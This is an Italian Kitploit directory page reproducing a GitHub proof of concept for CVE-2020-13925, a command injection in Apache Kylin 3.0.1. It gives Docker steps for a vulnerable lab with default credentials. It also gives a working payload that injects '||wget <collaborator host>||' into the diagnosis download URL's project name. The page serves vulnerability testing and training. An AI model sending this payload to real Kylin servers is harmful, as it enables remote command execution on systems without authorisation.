Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-13925 | Kitploit
Strumenti/GitHubGitHub/bit4woo/cve-2020-13925
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

Vedi Repository
1616 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-13925

Allestimento dell'ambiente

Fare riferimento a https://github.com/apache/kylin per la distribuzione dell'ambiente tramite Docker, modificando la versione a 3.0.1 (la versione vulnerabile). È possibile rimuovere 【-m 8G \ 】, che serve a impostare la dimensione della memoria allocata.

Quindi accedere a http://host:7070/kylin/login. Il nome utente e la password iniziali sono ADMIN/KYLIN.

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

PoC di verifica della vulnerabilità

root@kitploit:~
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
        
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

Passaggi per la riproduzione

Accedere a System-Configuration-Diagnosis. Viene attivata la richiesta per il download delle informazioni diagnostiche http://host:port/kylin/api/diag/project/learn_kylin/download image.png

È sufficiente sostituire il nome del progetto “learn_kylin” con il payload indicato sopra e accedere.

image.png

Link di riferimento

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

Scarica lo strumento